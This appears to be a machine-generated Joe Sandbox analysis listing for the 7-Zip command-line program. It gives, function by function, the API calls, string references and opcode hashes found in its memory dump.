                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Create$CloseHandleTimefree
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 234454789-0
                                                                                                                                                                                                        • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                        • Instruction ID: 3144be475387897c3d68ae26381de654b38c1ff5a197bbf3f4aeeb0426b3b6f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC21D43230059086D6209F26F954B6A7761F386BF9F5403A1EF7543BE8CB38C98EC640
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                                                                                        • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                        • Instruction ID: 060c78ea6709d17f33ed46c977c3c6ec17a7dd338ffb01f13fdaa20776019f88
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11DFA130575091EF04DF269D923A927A1DB0AFC0F8884A8CE1A9B205EF78CA46C342
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B5B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,00B782CA), ref: 00B5B56F
                                                                                                                                                                                                          • Part of subcall function 00B5B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4AA
                                                                                                                                                                                                          • Part of subcall function 00B5B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4F8
                                                                                                                                                                                                        • free.MSVCRT ref: 00B78343
                                                                                                                                                                                                          • Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
                                                                                                                                                                                                          • Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C
                                                                                                                                                                                                          • Part of subcall function 00B58624: free.MSVCRT ref: 00B586A9
                                                                                                                                                                                                        • free.MSVCRT ref: 00B7832B
                                                                                                                                                                                                        • free.MSVCRT ref: 00B78336
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$QueryValue$Openmemmove
                                                                                                                                                                                                        • String ID: 7z.dll$Software\7-zip
                                                                                                                                                                                                        • API String ID: 2771487249-1558686312
                                                                                                                                                                                                        • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                        • Instruction ID: 5a1a98d3ca060f9c3a9adf1127a5af4f553540fa4c820f6818b28342da12ac2b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7111CA52345D4050CA20EB21E5553EE63A0EBD6BE1F8452D1BD5D577A6DF28C64ECB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3873070119-0
                                                                                                                                                                                                        • Opcode ID: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
                                                                                                                                                                                                        • Instruction ID: 12669ea591a27567b217e72fab7a989be72fd7577f2b7637a66827c27e0b09b0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E112B63314945A6DB20EB26E84036A7370F799BA5F404261EFAE83BA5DF2CC949C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3252411863-0
                                                                                                                                                                                                        • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                        • Instruction ID: dbe36ec36e86f6e33cf8b397f785d47fc9e167c89bfa2a11cc6f11fbee272f65
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89018812304A0181D6209B21E98437D23B1DBCA7F2F9843F0DE6D937E5DF29C98E8600
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                        • Instruction ID: 21e328073c7271d750c5f2dd92c1ea2d6fd690b57e54a4d095f78253cf10f8a5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5F0B76335790442CA15FB26E5A166A5390A787F92F0114E29F0E67721DE38C48BCB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                        • Instruction ID: 0e2a86214ceb1b792968b57cb9d58908e200489a6834b84d0eb6e0fd6caaa067
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFE0F563713C0481CB14FF76DCA222E23A4EBD7F8971410D19F2EAB325CD20C85A8B84
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B925EC
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B92636
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                                                                                        • String ID: Name$Size
                                                                                                                                                                                                        • API String ID: 2276422817-481755742
                                                                                                                                                                                                        • Opcode ID: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
                                                                                                                                                                                                        • Instruction ID: 66d1b34f8bf55ddd1443e948893eae4e2087715bc494132fac5b83100df92f51
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A41E372615780A2CF26EF34E4547DE37A0F754B99F8491A2AF5E42261DF78CA4AC340
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BDCD
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BE0B
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$memset
                                                                                                                                                                                                        • String ID: : Removing files after including to archive$Removing
                                                                                                                                                                                                        • API String ID: 3543874852-1218467041
                                                                                                                                                                                                        • Opcode ID: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
                                                                                                                                                                                                        • Instruction ID: f660446e2c9e6d08735f25ecaeacd61ccc077e450a2343950230401b73b38ec3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B531A162205A8192DE69EB31E4817EE73A0E741B84F4884B29B9F46261DF7CD4CEC300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9C4FD
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9C50D
                                                                                                                                                                                                        • free.MSVCRT ref: 00B9C553
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                        • API String ID: 2276422817-3653984579
                                                                                                                                                                                                        • Opcode ID: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
                                                                                                                                                                                                        • Instruction ID: 84fd74a0f361c43462e2782a69b9534834b6d692d816840911fd79c0d4d235ab
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F118412341A4291DE28EB35D85137D63A0FB86BE5F0842B1EF2E57796EF38D8598344
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9B8EB
                                                                                                                                                                                                        • free.MSVCRT ref: 00B9B90A
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                                                                                        • String ID: ERROR: $WARNING:
                                                                                                                                                                                                        • API String ID: 2276422817-2114518728
                                                                                                                                                                                                        • Opcode ID: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
                                                                                                                                                                                                        • Instruction ID: a94fce21d136dae12837cf68ca7534f24846ddaadccade5d994d47a41a682774
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23116312306A4145DA29EB22E9517BE7350E786BE5F4842F2EF6F57391DF2CC489C304
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                                                                                        • String ID: ERROR:
                                                                                                                                                                                                        • API String ID: 4171338575-977468659
                                                                                                                                                                                                        • Opcode ID: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
                                                                                                                                                                                                        • Instruction ID: a2280a4196c254d3bb9f32da733389116734d8a46c05ebaf7c779c4bf5ae91b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E11B23234194296DF05DF29EC407B833A1FB86BA5F4846B2DF2E5B2A4CF388449C314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BC6C
                                                                                                                                                                                                        • free.MSVCRT ref: 00B9BC78
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$freememset
                                                                                                                                                                                                        • String ID: Archive size: $Files read from disk
                                                                                                                                                                                                        • API String ID: 2276422817-3736835528
                                                                                                                                                                                                        • Opcode ID: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
                                                                                                                                                                                                        • Instruction ID: 15516f3c872cd05d023fe47e858d5720d53d0f72867f25d63d02fa60fb758f85
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F11306330594190CF20EF24E89139D6770EBC57E9F8456B2EA5E876B9DF28C68EC700
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: a$z
                                                                                                                                                                                                        • API String ID: 0-4151050625
                                                                                                                                                                                                        • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                        • Instruction ID: 675ca8c228a8aac6d94d75a321d49ebdd5d4696b94460a6f7cc02436f968b182
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6018C16F0709A85EB247B11A8943F8A2D2D717BA3F8D41F39F8907310E22949DEE312
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                        • API String ID: 1646373207-1489217083
                                                                                                                                                                                                        • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                        • Instruction ID: aaf383a7aaa396cdb2b7bac4aa830279aee1fe087ffba525c5f3bc9de8cc32fa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37F0A43131450597DB30EB20F4943B873F0EB48327F8406B5EB4A82690DB7CD94CCA01
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BACF
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9BAFC
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free
                                                                                                                                                                                                        • String ID: Open archive: $StdOut
                                                                                                                                                                                                        • API String ID: 3873070119-2401103298
                                                                                                                                                                                                        • Opcode ID: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
                                                                                                                                                                                                        • Instruction ID: 6db61e26c03ca71f8faadbb21133a9648f57b2b14e467b3115dbe9f2016628cc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AEF05EA5305C8581CE059F2ADAC576D2361FB45FD5F48D472CE0E4B318DF28C489C300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
